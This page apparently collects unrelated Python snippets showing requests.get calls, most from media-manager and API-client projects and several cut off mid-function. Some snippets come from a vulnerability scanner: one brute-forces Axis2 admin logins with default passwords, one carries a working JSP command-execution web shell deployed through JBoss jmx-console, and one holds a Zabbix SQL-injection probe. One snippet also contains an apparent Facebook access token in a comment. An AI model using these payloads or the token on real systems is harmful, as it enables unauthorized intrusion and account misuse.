예제 #1
0
    def sendMessage(self, msg, element=None):
        if element is None:
            return True
        basic_url = self._createUrl(self.c.host, self.c.port)

        if element.status in common.getCompletedStatuses():
            requests.get("%s/library/sections/%s/refresh" % (basic_url, self.c.section_select))
예제 #2
0
def _xem_refresh(indexer_id, indexer):
    """
    Refresh data from xem for a tv show
    
    @param indexer_id: int
    """
    if indexer_id is None:
        return

    indexer_id = int(indexer_id)
    indexer = int(indexer)

    try:
        logger.log(
            u'Looking up XEM scene mapping for show %s on %s' % (indexer_id, sickbeard.indexerApi(indexer).name,),
            logger.DEBUG)
        data = requests.get("http://thexem.de/map/all?id=%s&origin=%s&destination=scene" % (
            indexer_id, sickbeard.indexerApi(indexer).config['xem_origin'],), verify=False).json()

        if data is None or data == '':
            logger.log(u'No XEN data for show "%s on %s", trying TVTumbler' % (
                indexer_id, sickbeard.indexerApi(indexer).name,), logger.MESSAGE)
            data = requests.get("http://show-api.tvtumbler.com/api/thexem/all?id=%s&origin=%s&destination=scene" % (
                indexer_id, sickbeard.indexerApi(indexer).config['xem_origin'],), verify=False).json()
            if data is None or data == '':
                logger.log(u'TVTumbler also failed for show "%s on %s".  giving up.' % (indexer_id, indexer,),
                           logger.MESSAGE)
                return None

        result = data
        if result:
            cacheDB = db.DBConnection('cache.db')
            cacheDB.action("INSERT OR REPLACE INTO xem_refresh (indexer, indexer_id, last_refreshed) VALUES (?,?,?)",
                           [indexer, indexer_id, time.time()])
            if 'success' in result['result']:
                cacheDB.action("DELETE FROM xem_numbering where indexer = ? and indexer_id = ?", [indexer, indexer_id])
                for entry in result['data']:
                    if 'scene' in entry:
                        cacheDB.action(
                            "INSERT INTO xem_numbering (indexer, indexer_id, season, episode, scene_season, scene_episode) VALUES (?,?,?,?,?,?)",
                            [indexer, indexer_id, entry[sickbeard.indexerApi(indexer).config['xem_origin']]['season'],
                             entry[sickbeard.indexerApi(indexer).config['xem_origin']]['episode'],
                             entry['scene']['season'], entry['scene']['episode']])
                    if 'scene_2' in entry:  # for doubles
                        cacheDB.action(
                            "INSERT INTO xem_numbering (indexer, indexer_id, season, episode, scene_season, scene_episode) VALUES (?,?,?,?,?,?)",
                            [indexer, indexer_id, entry[sickbeard.indexerApi(indexer).config['xem_origin']]['season'],
                             entry[sickbeard.indexerApi(indexer).config['xem_origin']]['episode'],
                             entry['scene_2']['season'], entry['scene_2']['episode']])
            else:
                logger.log(u'Failed to get XEM scene data for show %s from %s because "%s"' % (
                    indexer_id, sickbeard.indexerApi(indexer).name, result['message']), logger.DEBUG)
        else:
            logger.log(u"Empty lookup result - no XEM data for show %s on %s" % (
                indexer_id, sickbeard.indexerApi(indexer).name,), logger.DEBUG)
    except Exception, e:
        logger.log(u"Exception while refreshing XEM data for show " + str(indexer_id) + " on " + sickbeard.indexerApi(
            indexer).name + ": " + ex(e), logger.WARNING)
        logger.log(traceback.format_exc(), logger.DEBUG)
        return None
예제 #3
0
    def getURL(self, url, post_data=None, headers=None):

        if not headers:
            headers = {}

        # Glype Proxies does not support Direct Linking.
        # We have to fake a search on the proxy site to get data
        if self.proxy.isEnabled():
            headers.update({'referer': self.proxy.getProxyURL()})

        try:
            if sickbeard.PROXY_SETTING:
                proxies = {
                    "http": sickbeard.PROXY_SETTING,
                    "https": sickbeard.PROXY_SETTING,
                }

                r = requests.get(url, headers=headers, proxies=proxies)
            else:
                r = requests.get(url, headers=headers)
        except (requests.exceptions.ConnectionError,
                requests.exceptions.HTTPError), e:
            logger.log(
                u"Error loading " + self.name + " URL: " +
                str(sys.exc_info()) + " - " + ex(e), logger.ERROR)
            return None
예제 #4
0
def exploit(ip):
    result = []
    if Domain:
        for domain in Domain:
            try:
                url = domain+'/axis2/axis2-admin/'
                resp = requests.get(url, timeout=TIME_OUT, proxies=MY_PROXY, headers={"User-Agent": random.choice(USER_AGENT_LIST)}, allow_redirects=True, verify=False)
            except Exception,e:
                logging.error(e)
                continue
            if "axis_l.jpg" in resp.text and resp.status_code == 200:
                result.append('%s/axis2/axis2-admin/ >>>> 存在axis管理口'%domain)
                flag_list=['Administration Page</title>','System Components','"axis2-admin/upload"','include page="footer.inc">','axis2-admin/logout']
                user_list=['axis','admin','manager','root']
                pass_list=['axis','axis2','123456','12345678','password','123456789','admin123','admin888','admin1','administrator','8888888','123123','admin','manager','root']
                for user in user_list:
                    for password in pass_list:
                        try:
                            login_url = domain+'/axis2/axis2-admin/login'
                            data = {'username':user, 'password':password, 'submit':'Login'}
                            resp = requests.post(login_url, data=data, timeout=TIME_OUT, proxies=MY_PROXY, headers={"User-Agent": random.choice(USER_AGENT_LIST)}, allow_redirects=True, verify=False)
                        except Exception,e:
                            logging.error(e)
                            continue
                        for flag in flag_list:
                            if flag in resp.text:
                                result.append('%s >>>> 存在Axis弱口令%s:%s'%(domain,user,password))
            url = domain+"/axis2/axis2-web/HappyAxis.jsp"
            try:
                resp = requests.get(url, timeout=TIME_OUT, proxies=MY_PROXY, headers={"User-Agent": random.choice(USER_AGENT_LIST)}, allow_redirects=True, verify=False)
            except Exception,e:
                logging.error(e)
예제 #5
0
파일: base.py 프로젝트: xxbing123/Scanver
    def load(self):
        res = requests.get(
            self.url,
            allow_redirects=False,
            #proxies=self.proxy,
            #timeout=self.timeout,
            verify=False)
        self.headers = res.headers
        self.server = res.headers.get('Server', self.server)
        xpoweredby1 = res.headers.get('X-Powered-By', '')
        xpoweredby2 = self.findxpoweredby(res)
        self.xpoweredby = xpoweredby2 + '|' + self.xpoweredby if xpoweredby2 else xpoweredby1
        res = requests.get(
            self.url,
            #proxies=self.proxy,
            #timeout=self.timeout,
            verify=False)
        self.status_code = res.status_code
        self.title = ''.join(
            re.findall(r"<title>([\s\S]*?)</title>",
                       res.text.encode(res.encoding).decode('utf-8'), re.I))
        self.server = res.headers.get('Server', self.server)
        xpoweredby3 = res.headers.get('X-Powered-By', self.xpoweredby)
        xpoweredby4 = self.findxpoweredby(res)
        self.xpoweredby = xpoweredby4 + '|' + self.xpoweredby if xpoweredby4 else xpoweredby3 + '|' + self.xpoweredby

        if 'JSP' in self.xpoweredby:
            server = self.javaserver(self.scheme, self.netloc)
            self.server = server + '|' + self.server if server else res.headers.get(
                'Server')

        self.cmsver = '|'.join(list(CMS.load(self.url)))
예제 #6
0
def exploit(ip):
    result = []
    if Domain:
        for domain in Domain:
            vul_url1 = domain + '/status?full=true'
            try:
                resp = requests.get(vul_url1, timeout=TIME_OUT, proxies=MY_PROXY, headers={"User-Agent": random.choice(USER_AGENT_LIST)}, allow_redirects=True, verify=False)
                if resp.status_code == 200 and "Max processing time" in resp.text:
                    result.append('%s >>>> 存在Jboss信息泄漏漏洞'%vul_url1)
            except Exception,e:
                logging.error(e)
            shell="""<%@ page import="java.util.*,java.io.*"%> <% %> <HTML><BODY> <FORM METHOD="GET" NAME="comments" ACTION=""> <INPUT TYPE="text" NAME="comment"> <INPUT TYPE="submit" VALUE="Send"> </FORM> <pre> <% if (request.getParameter("comment") != null) { out.println("Command: " + request.getParameter("comment") + "<BR>"); Process p = Runtime.getRuntime().exec(request.getParameter("comment")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); } } %> </pre> </BODY></HTML>"""
            vul_url2 = domain + "/jmx-console/HtmlAdaptor"
            shellcode=""
            name=random_str(5)
            for v in shell:
                shellcode+=hex(ord(v)).replace("0x","%")
            params = {"action":"invokeOpByName","name":"jboss.admin%3Aservice%3DDeploymentFileRepository","methodName":"store","argType":"java.lang.String","arg0":name+".war","argType":"java.lang.String","arg1":name,"argType":"java.lang.String","arg2":".jsp","argType":"java.lang.String","arg3":"shellcode","argType":"boolean","arg4":"True"}
            try:
                resp = requests.head(vul_url2, params=params, timeout=TIME_OUT, proxies=MY_PROXY, headers={"User-Agent": random.choice(USER_AGENT_LIST)}, allow_redirects=True, verify=False)
                shell_url = "%s/%s.jsp"%(domain,name)
                resp = requests.get(shell_url, timeout=TIME_OUT, proxies=MY_PROXY, headers={"User-Agent": random.choice(USER_AGENT_LIST)}, allow_redirects=True, verify=False)
                if "comments" in resp.text:
                    result.append('%s >>>> 存在Jboss getshell漏洞 %s'%(vul_url2,shell_url))
            except Exception,e:
                logging.error(e)
            login = ["/admin-console/login.seam","/jmx-console","/console/App.html"]
            for login_uri in login:
                try:
                    resp = requests.get(domain+login_uri, timeout=TIME_OUT, proxies=MY_PROXY, headers={"User-Agent": random.choice(USER_AGENT_LIST)}, allow_redirects=True, verify=False)
                except Exception,e:
                    logging.error(e)
                    continue
                if "JBoss" in resp.text or resp.status_code == 401:
                        result.append('%s >>>> 存在Jboss管理口'%(domain+login_uri))
예제 #7
0
 def getSearch(self, host):
     returns = []
     try:
         resp1 = requests.get(bing_api + host, timeout=TIME_OUT)
         resp2 = requests.get(baidu_api + host, timeout=TIME_OUT)
     except Exception, e:
         logging.error(e)
         return []
예제 #8
0
def get_fb_pictures(fb_album_id):
    #Get all pictures from our album & parse the JSON code
    fb_photos_API_url = "https://graph.facebook.com/v2.6/" + fb_album_id + "/photos?access_token=" + fb_token  #EAAGm0PX4ZCpsBAAWDgyqlZAUJiFoHeeOknxuxf5LLz7M97R66tnkE3ZASHubh76HoS1KQxOuFXM1UjqPpYA2bMhIdqBqlW9kxp14tPoSgY9ZABoZA2ZB48USTijQDqhEVYZCZBtkvO5dkYjyQme5SFGTDSDSZCptZAxN4ztqrTPva7WAZDZD "#"https://graph.facebook.com/v2.6/"+ str(548385795271621) + "/albums?access_token=" + fb_token
    fb_photos = requests.get(fb_photos_API_url).json()

    #Parse JSON and get all the urls of those pictures & send them to QML
    for i in range(0, len(fb_photos['data'])):
        fb_photo_id = fb_photos['data'][i]['id']
        fb_photo_API_url = "https://graph.facebook.com/v2.6/" + fb_photo_id + "?fields=source&access_token=" + fb_token
        fb_photo = requests.get(fb_photo_API_url)
        pyotherside.send('fb_photos', fb_photo.json())
예제 #9
0
def checkGithub():

    # Get the latest commit available from github
    url = 'https://api.github.com/repos/%s/mylar/commits/%s' % (
        mylar.GIT_USER, mylar.GIT_BRANCH)
    logger.info('Retrieving latest version information from github')
    try:
        response = requests.get(url, verify=True)
        git = response.json()
        mylar.LATEST_VERSION = git['sha']
    except:
        logger.warn('Could not get the latest commit from github')
        mylar.COMMITS_BEHIND = 0
        return mylar.CURRENT_VERSION

    # See how many commits behind we are
    if mylar.CURRENT_VERSION:
        logger.fdebug('Comparing currently installed version [' +
                      mylar.CURRENT_VERSION +
                      '] with latest github version [' + mylar.LATEST_VERSION +
                      ']')
        url = 'https://api.github.com/repos/%s/mylar/compare/%s...%s' % (
            mylar.GIT_USER, mylar.CURRENT_VERSION, mylar.LATEST_VERSION)

        try:
            response = requests.get(url, verify=True)
            git = response.json()
            mylar.COMMITS_BEHIND = git['total_commits']
        except:
            logger.warn('Could not get commits behind from github')
            mylar.COMMITS_BEHIND = 0
            return mylar.CURRENT_VERSION

        if mylar.COMMITS_BEHIND >= 1:
            logger.info('New version is available. You are %s commits behind' %
                        mylar.COMMITS_BEHIND)
        elif mylar.COMMITS_BEHIND == 0:
            logger.info('Mylar is up to date')
        elif mylar.COMMITS_BEHIND == -1:
            logger.info(
                'You are running an unknown version of Mylar. Run the updater to identify your version'
            )

    else:
        logger.info(
            'You are running an unknown version of Mylar. Run the updater to identify your version'
        )

    return mylar.LATEST_VERSION
예제 #10
0
def main(wf):
    try:
        token = wf.get_password('coda_token')

        def wrapper():
            return get_docs(token)

        docs = wf.cached_data('docs', wrapper, max_age=1)
        wf.logger.debug("%s docs cached" % len(docs['items']))

        filelist = []
        for f in os.listdir('icons'):
            os.remove('icons/%s' %
                      f)  # remove existing icons in case icon was removed

        for item in docs['items']:
            try:
                icon = requests.get(item['icon']['browserLink'])

                with open("icons/%s.png" % item['id'], 'wb') as iconFile:
                    iconFile.write(icon.content)
            except:
                None  # silently fail if no icon found

        wf.store_data('error', 0)

    except PasswordNotFound:
        wf.logger.error("No API token saved")
예제 #11
0
def exploit(URL, Thread):
    logger.process("Request "+URL)
    r = requests.get(URL)
    r.close()
    if r.status_code == 200:
        logger.success("200")
        return "200"
예제 #12
0
    def _searchForElement(self, term="", id=0):
        self.progress.reset()
        self._pCache = {}
        mt = MediaType.get(MediaType.identifier == "de.lad1337.games")
        mtm = mt.manager
        rootElement = mtm.getFakeRoot(term)
        payload = {}
        url = "http://thegamesdb.net/api/GetGame.php?"
        if term and not id:
            payload["name"] = term
        else:
            payload["id"] = id
        # r = requests.get('http://thegamesdb.net/api/GetGame.php', params=payload)
        r = requests.get(url, params=payload)
        log("tgdb search url " + r.url)
        root = ET.fromstring(r.text.encode("utf-8"))

        baseImgUrlTag = root.find("baseImgUrl")
        if baseImgUrlTag is not None:
            base_url = baseImgUrlTag.text
        else:
            base_url = "http://thegamesdb.net/banners/"

        for curGame in root.getiterator("Game"):
            self._createGameFromTag(curGame, base_url, rootElement)

        log("%s found %s games" % (self.name, self.progress.count))

        return rootElement
예제 #13
0
    def addDownload(self, download):
        payload = {'apikey': self.c.apikey,
                 'name': download.url,
                 'nzbname': self._downloadName(download),
                 'mode': 'addurl',
                 'output': 'json'
                 }

        cat = self._getCategory(download.element)
        if cat is not None:
            payload['cat'] = cat
        try:
            r = requests.get(self._baseUrl(), params=payload, verify=False)
        except:
            log.error("Unable to connect to Sanzbd. Most likely a timout. is Sab running")
            return False
        log("final sab url %s" % r.url, censor={self.c.apikey: 'apikey'})
        log("sab response code: %s" % r.status_code)
        log("sab response: %s" % r.text)
        log.info("NZB added to Sabnzbd")

        jsonSabResponse = r.json()
        if 'status' in jsonSabResponse:
            return jsonSabResponse['status']
        return False
예제 #14
0
파일: Sabnzbd.py 프로젝트: sinfuljosh/XDM
    def _getQueue(self):

        payload = {"apikey": self.c.apikey, "mode": "qstatus", "output": "json"}
        r = requests.get(self._baseUrl(), params=payload)
        response = r.json()
        self._queue = response["jobs"]
        return self._queue
예제 #15
0
        def setGroupId(client, group_url):
            group_string = 'temptaking.ado.sg/group/'
            if group_url.startswith(group_string):
                group_url = 'https://' + group_url
            if group_url.startswith('https://' +
                                    group_string) or group_url.startswith(
                                        'http://' + group_string):
                try:
                    req_text = str(
                        requests.get(group_url).content.decode('utf-8'))
                except:
                    return 0
                if 'Invalid code' in req_text:
                    return -1

                def urlParse(text):
                    return text[text.find('{'):text.rfind('}') + 1]

                try:
                    parsed_url = json.loads(urlParse(req_text))
                except:
                    return -1
                client.groupName = parsed_url["groupName"]
                client.groupId = parsed_url["groupCode"]
                client.groupMembers = json.dumps(parsed_url["members"])
                client.put()
                return 1
            else:
                return -1
def scrapeGameLink(link='http://sports.yahoo.com/nba/boston-celtics-trail-blazers-2014040922/', save_dir='../data/box_scores/', target_date=date.today()):


	TARGET_LINK = link
	SAVE_DIR = '../data/box_scores/'

	print "[STATUS] Downloading {0}".format(TARGET_LINK)
	r = requests.get(TARGET_LINK)

	if(r.status_code != requests.codes.ok):
		print "ERROR: Request did not come back with OK status code"
		exit()

	raw_html = r.text

	box_score = YahooBoxScore(raw_html, TARGET_LINK, target_date)
	box_score.uploadToDB(db)
	home_team = box_score.home_team
	away_team = box_score.away_team
	game_date = box_score.game_date

	print "Game Date: {0}".format(game_date.strftime('%c'))
	print "{1} vs. {0}".format(away_team, home_team)


	FILENAME_CSV = "{0}_vs_{1}_{2}.csv".format(away_team, home_team, game_date.strftime('%d-%m-%Y'))
	FILENAME_JSON = "{0}_vs_{1}_{2}.json".format(away_team, home_team, game_date.strftime('%d-%m-%Y'))

	RELATIVE_PATH = SAVE_DIR+FILENAME_CSV



	print "[STATUS] Saving {0}".format(RELATIVE_PATH)

	flushStatsToCSV(box_score.player_stats, SAVE_DIR + FILENAME_CSV)
예제 #17
0
def fetchURL(URL, headers=None, retry=True):
    """ Return the result of fetching a URL and True if success
        Otherwise return error message and False
        Allow one retry on timeout by default"""

    if headers is None:
        # some sites insist on having a user-agent, default is to add one
        # if you don't want any headers, send headers=[]
        headers = {'User-Agent': USER_AGENT}
    proxies = proxyList()
    try:
        timeout = check_int(lazylibrarian.CONFIG['HTTP_TIMEOUT'], 30)
        r = requests.get(URL, headers=headers, timeout=timeout, proxies=proxies)

        if str(r.status_code).startswith('2'):  # (200 OK etc)
            return r.content, True
        return "Response status %s: %s" % (r.status_code, r.content), False
    except requests.exceptions.Timeout as e:
        if not retry:
            logger.error(u"fetchURL: Timeout getting response from %s" % URL)
            return "Timeout %s" % str(e), False
        logger.debug(u"fetchURL: retrying - got timeout on %s" % URL)
        result, success = fetchURL(URL, headers=headers, retry=False)
        return result, success
    except Exception as e:
        if hasattr(e, 'reason'):
            return "Exception %s: Reason: %s" % (type(e).__name__, str(e.reason)), False
        return "Exception %s: %s" % (type(e).__name__, str(e)), False
예제 #18
0
    def init(self):

        super(Itasa, self).init()
        login_pattern = '<input type="hidden" name="return" value="([^\n\r\t ]+?)" /><input type="hidden" name="([^\n\r\t ]+?)" value="([^\n\r\t ]+?)" />'

        response = requests.get(self.server_url + 'index.php')
        if response.status_code != 200:
            raise ServiceError('Initiate failed')

        match = re.search(login_pattern, response.content,
                          re.IGNORECASE | re.DOTALL)
        if not match:
            raise ServiceError('Can not find unique id parameter on page')

        login_parameter = {
            'username': '******',
            'passwd': 'subliminal',
            'remember': 'yes',
            'Submit': 'Login',
            'remember': 'yes',
            'option': 'com_user',
            'task': 'login',
            'silent': 'true',
            'return': match.group(1),
            match.group(2): match.group(3)
        }

        self.session = requests.session()
        r = self.session.post(self.server_url + 'index.php',
                              data=login_parameter)
        if not re.search('logouticon.png', r.content,
                         re.IGNORECASE | re.DOTALL):
            raise ServiceError('Itasa Login Failed')
예제 #19
0
파일: prove.py 프로젝트: rahulworld/istsos2
def services_name_operations_getobservation_offerings_name_procedures_GET(pp):
    print "services/{name}/operations/getobservation/offerings/{name}/procedures/..., GET"

    dbname = 'demo'
    oname = 'temporary'
    pname = 'BELLINZONA'
    obprop = 'urn:ogc:def:parameter:x-istsos:1.0:meteo:air:temperature'
    start = '2013-01-01T00:10:00.000000+0100'
    end = '2013-01-05T00:00:00.000000+0100'

    res = requests.get('http://localhost/istsos/wa/istsos/services/' + dbname +
                       '/operations/getobservation/offerings/' + oname +
                       '/procedures/' + pname + '/observedproperties/' +
                       obprop + '/eventtime/' + start + '/' + end,
                       prefetch=True)

    try:
        res.raise_for_status(
        )  # raise exception if som comunication error occured
    except Exception as e:
        print str(e)

    pp.pprint(res.json)

    print "\n ************************************ \n"
예제 #20
0
    def init(self):
       
        super(Itasa, self).init()
        login_pattern = '<input type="hidden" name="return" value="([^\n\r\t ]+?)" /><input type="hidden" name="([^\n\r\t ]+?)" value="([^\n\r\t ]+?)" />'

        response = requests.get(self.server_url + 'index.php')
        if response.status_code != 200:
            raise ServiceError('Initiate failed')
        
        match = re.search(login_pattern, response.content, re.IGNORECASE | re.DOTALL)
        if not match:
            raise ServiceError('Can not find unique id parameter on page')
        
        login_parameter = {'username': '******',
                           'passwd': 'subliminal',
                           'remember': 'yes',
                           'Submit': 'Login',
                           'remember': 'yes',
                           'option': 'com_user',
                           'task': 'login',
                           'silent': 'true',
                           'return': match.group(1), 
                            match.group(2): match.group(3)
                          }

        self.session = requests.session()
        r = self.session.post(self.server_url + 'index.php', data=login_parameter)
        if not re.search('logouticon.png', r.content, re.IGNORECASE | re.DOTALL):
            raise ServiceError('Itasa Login Failed')
예제 #21
0
def exploit(ip):
    result = []
    weakfile = [
        ['/containers/json','HostConfig'],
        ['/spaces/viewdefaultdecorator.action?decoratorName=/','log4j.properties'],
        ['/_cat','/_cat/master'],
        ['/.git/config','repositoryformatversion'],
        ['/.svn/all-wcprops','svn:wc:ra_dav:version-url'],
        ['/jsrpc.php?type=9&method=screen.get&timestamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x36),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17','c5a880faf6fb5e6087eb1b2dc'],
        ['/otua*~1.*/.aspx','400']
    ]
    if Domain:
        for domain in Domain:
            for i in weakfile:
                url = domain+i[0]
                try:
                    resp = requests.get(url, timeout=TIME_OUT, proxies=MY_PROXY, headers={"User-Agent": random.choice(USER_AGENT_LIST)}, allow_redirects=True, verify=False)
                except Exception,e:
                    logging.error(e)
                    continue
                if i[1].isdigit():
                    if resp.status_code == int(i[1]):
                        result.append('%s >>>> 存在弱点文件'%url)
                else:
                    if i[1] in resp.text:
                        result.append('%s >>>> 存在弱点文件'%url)
        if len(result):
            return result
 def get(self):
     response = requests.get("https://api.venmo.com/v1/me?access_token=" + self.request.get('access_token'))
     balance = response.json().get('data').get('balance')
     
     payload = {}
     payload['balance'] = balance
     self.response.write(json.dumps(payload))
예제 #23
0
def find_download(clientAgent, download_id):
    tc = create_torrent_class(clientAgent)

    logger.debug("Searching for Download on %s ..." % (clientAgent))
    if clientAgent == 'utorrent':
        torrents = tc.list()[1]['torrents']
        for torrent in torrents:
            if download_id in torrent:
                return True
    if clientAgent == 'transmission':
        torrents = tc.get_torrents()
        for torrent in torrents:
            hash = torrent.hashString
            if hash == download_id:
                return True
    if clientAgent == 'deluge':
        pass
    if clientAgent == 'sabnzbd':
        baseURL = "http://%s:%s/api" % (nzbtomedia.SABNZBDHOST, nzbtomedia.SABNZBDPORT)
        url = baseURL
        params = {}
        params['apikey'] = nzbtomedia.SABNZBDAPIKEY
        params['mode'] = "get_files"
        params['output'] = 'json'
        params['value'] = download_id
        try:
            r = requests.get(url, params=params)
        except requests.ConnectionError:
            logger.error("Unable to open URL")
            return 1  # failure

        result = r.json()
        if result['files']:
            return True
예제 #24
0
 def _getMovieWatchlist(self, username, password, apikey):
     url = self._makeURL(movieWatchlistURL, apikey, username)
     try:
         r = requests.get(url, auth=(username, self._hash(password)))
         return r.json()
     except:
         return []
예제 #25
0
    def search(cls, artist_name, album_name=None):
        search_query = artist_name + " " + album_name if album_name else artist_name
        params = {
            "search": search_query,
            "catid": cls.categories["all"],
            "num": cls.max_results,
            "username": config.nzbmatrix.username,
            "apikey": config.nzbmatrix.api_key,
        }
        request = requests.get(cls.search_url, params=params)
        results = cls.parse_search_results(request.content)

        return results

        @staticmethod
        def parse_search_results(result_content):
            results = []
            result_chunks = re.split("\\n|\\n", result_content)

            for result in result_chunks:
                result_lines = result.split("\n")
                result_dict = {}

                for line in result_lines:
                    key = re.findall("^(.+):", line)[0]
                    value = re.findall(":(.+);$", line)[0]
                    result_dict[key] = value.lower()

                results.append(result_dict)

            return results
예제 #26
0
    def _response(self):
        if not self._cached_response:
            if not self._check_user_agent():
                raise UserAgentError("Invalid or no User-Agent set.")
            self._cached_response = requests.get(self._uri, params=self._params, headers=self._headers)

        return self._cached_response
예제 #27
0
    def _searchForElement(self, term='', id=0):
        self.progress.reset()
        self._pCache = {}
        mt = MediaType.get(MediaType.identifier == 'de.lad1337.games')
        mtm = mt.manager
        rootElement = mtm.getFakeRoot(term)
        payload = {}
        url = 'http://thegamesdb.net/api/GetGame.php?'
        if term and not id:
            payload['name'] = term
        else:
            payload['id'] = id
        #r = requests.get('http://thegamesdb.net/api/GetGame.php', params=payload)
        r = requests.get(url, params=payload)
        log('tgdb search url ' + r.url)
        root = ET.fromstring(r.text.encode('utf-8'))

        baseImgUrlTag = root.find('baseImgUrl')
        if baseImgUrlTag is not None:
            base_url = baseImgUrlTag.text
        else:
            base_url = "http://thegamesdb.net/banners/"

        for curGame in root.getiterator('Game'):
            self._createGameFromTag(curGame, base_url, rootElement)

        log("%s found %s games" % (self.name, len(list(rootElement.children))))

        return rootElement
예제 #28
0
def pullsearch(comicapi, comicquery, offset, explicit, type):
    u_comicquery = urllib.quote(comicquery.encode('utf-8').strip())
    u_comicquery = u_comicquery.replace(" ", "%20")

    if explicit == 'all' or explicit == 'loose':
        PULLURL = mylar.CVURL + 'search?api_key=' + str(comicapi) + '&resources=' + str(type) + '&query=' + u_comicquery + '&field_list=id,name,start_year,first_issue,site_detail_url,count_of_issues,image,publisher,deck,description,last_issue&format=xml&page=' + str(offset)

    else:
        # 02/22/2014 use the volume filter label to get the right results.
        # add the 's' to the end of type to pluralize the caption (it's needed)
        if type == 'story_arc':
            u_comicquery = re.sub("%20AND%20", "%20", u_comicquery)
        PULLURL = mylar.CVURL + str(type) + 's?api_key=' + str(comicapi) + '&filter=name:' + u_comicquery + '&field_list=id,name,start_year,site_detail_url,count_of_issues,image,publisher,deck,description&format=xml&offset=' + str(offset) # 2012/22/02 - CVAPI flipped back to offset instead of page
    #all these imports are standard on most modern python implementations
    #logger.info('MB.PULLURL:' + PULLURL)

    #new CV API restriction - one api request / second.
    if mylar.CVAPI_RATE is None or mylar.CVAPI_RATE < 2:
        time.sleep(2)
    else:
        time.sleep(mylar.CVAPI_RATE)

    #download the file:
    payload = None
    verify = False

    try:
        r = requests.get(PULLURL, params=payload, verify=verify, headers=mylar.CV_HEADERS)
    except Exception, e:
        logger.warn('Error fetching data from ComicVine: %s' % (e))
        return
예제 #29
0
def storyarcinfo(xmlid):

    comicLibrary = listLibrary()

    arcinfo = {}

    if mylar.COMICVINE_API == 'None' or mylar.COMICVINE_API is None or mylar.COMICVINE_API == mylar.DEFAULT_CVAPI:
        logger.warn('You have not specified your own ComicVine API key - alot of things will be limited. Get your own @ http://api.comicvine.com.')
        comicapi = mylar.DEFAULT_CVAPI
    else:
        comicapi = mylar.COMICVINE_API

    #respawn to the exact id for the story arc and count the # of issues present.
    ARCPULL_URL = mylar.CVURL + 'story_arc/4045-' + str(xmlid) + '/?api_key=' + str(comicapi) + '&field_list=issues,name,first_appeared_in_issue,deck,image&format=xml&offset=0'
    logger.fdebug('arcpull_url:' + str(ARCPULL_URL))

    #new CV API restriction - one api request / second.
    if mylar.CVAPI_RATE is None or mylar.CVAPI_RATE < 2:
        time.sleep(2)
    else:
        time.sleep(mylar.CVAPI_RATE)

    #download the file:
    payload = None
    verify = False

    try:
        r = requests.get(ARCPULL_URL, params=payload, verify=verify, headers=mylar.CV_HEADERS)
    except Exception, e:
        logger.warn('Error fetching data from ComicVine: %s' % (e))
        return
예제 #30
0
 def test_SNI_URLS(self):
     if not enabled_sni:
         print("\nSNI is disabled when the cryptography module is missing, you may encounter SSL errors!")
     else:
         for provider in [ torrentday, rarbg, sceneaccess ]:
             #print 'Checking ' + provider.name
             self.assertEqual(requests.get(provider.url).status_code, 200)
예제 #31
0
파일: mb.py 프로젝트: ChapeLu/mylar
def storyarcinfo(xmlid):

    comicLibrary = listLibrary()

    arcinfo = {}

    if mylar.COMICVINE_API == 'None' or mylar.COMICVINE_API is None or mylar.COMICVINE_API == mylar.DEFAULT_CVAPI:
        logger.warn('You have not specified your own ComicVine API key - alot of things will be limited. Get your own @ http://api.comicvine.com.')
        comicapi = mylar.DEFAULT_CVAPI
    else:
        comicapi = mylar.COMICVINE_API

    #respawn to the exact id for the story arc and count the # of issues present.
    ARCPULL_URL = mylar.CVURL + 'story_arc/4045-' + str(xmlid) + '/?api_key=' + str(comicapi) + '&field_list=issues,name,first_appeared_in_issue,deck,image&format=xml&offset=0'
    logger.fdebug('arcpull_url:' + str(ARCPULL_URL))

    #new CV API restriction - one api request / second.
    if mylar.CVAPI_RATE is None or mylar.CVAPI_RATE < 2:
        time.sleep(2)
    else:
        time.sleep(mylar.CVAPI_RATE)

    #download the file:
    payload = None
    verify = False

    try:
        r = requests.get(ARCPULL_URL, params=payload, verify=verify, headers=mylar.CV_HEADERS)
    except Exception, e:
        logger.warn('Error fetching data from ComicVine: %s' % (e))
        return
예제 #32
0
def request_memberlist():
    """
    Requests the list of TFS members to update hiscores for, specifically from 
    the Google Sheet "TFS Hiscores - Data/db-memberlist".

    Parses list into $rsn_list global and returns it.
    """
    log('Retrieving memberlist...')
    gdoc_url_base   = 'https://docs.google.com/spreadsheet/pub?output=csv&key='
    gdoc_url = gdoc_url_base + gdoc_url_key + '&output=csv#gid=62'
    log('Attempting to retrieve memberlist from %s' % gdoc_url)
    gdoc_response = requests.get(gdoc_url)
    gdoc_contents = gdoc_response.content
    
    if gdoc_response.status_code != 200:
        terminate('Received status code %d on memberlist retrieval.'
                    % gdoc_response.status_code)

    log('Memberlist successfully retrieved')
    global rsn_list ## Must include global declaration to modify it
    rsn_list = [rsn for rsn in gdoc_contents.splitlines() if len(rsn) > 0]
    ## Ignore blank entries; we know there is at least one because the first
    ## entry should always be blank because the GDoc needs a blank header to
    ## to sort (alphabetize) the memberlist.

    return rsn_list
예제 #33
0
def exploit(URL, Thread):
    logger.process("Request " + URL)
    r = requests.get(URL)
    r.close()
    if r.status_code == 200:
        logger.success("200")
        return "200"
예제 #34
0
def findvideos(item):
    logger.info("pelisalacarta.channels.areadocumental findvideos")
    itemlist = []
    data = requests.get(item.url).text

    subs = scrapertools.find_multiple_matches(
        data, 'file: "(/webvtt[^"]+)".*?label: "([^"]+)"')

    patron = 'file: "http://217.160.176.9/comun/videos/([^"]+)".*?label: "([^"]+)"'
    matches = scrapertools.find_multiple_matches(data, patron)
    for url, quality in matches:
        url = "http://217.160.176.9/comun/videos/" + urllib.quote(url)
        for url_sub, label in subs:
            url_sub = host + urllib.quote(url_sub)
            label = label.encode('iso-8859-1').decode('utf8')
            title = "Ver video en [[COLOR green]" + quality + "[/COLOR]] " + "Sub " + label
            itemlist.append(
                Item(channel=__channel__,
                     action="play",
                     server="directo",
                     title=bbcode_kodi2html(title),
                     url=url,
                     thumbnail=item.thumbnail,
                     plot=item.plot,
                     subtitle=url_sub,
                     extra=item.url,
                     fanart=item.fanart,
                     folder=False))

    return itemlist
def verify(URL):
    r=requests.get(URL)
    r.close()
    if "Request" in r.content:
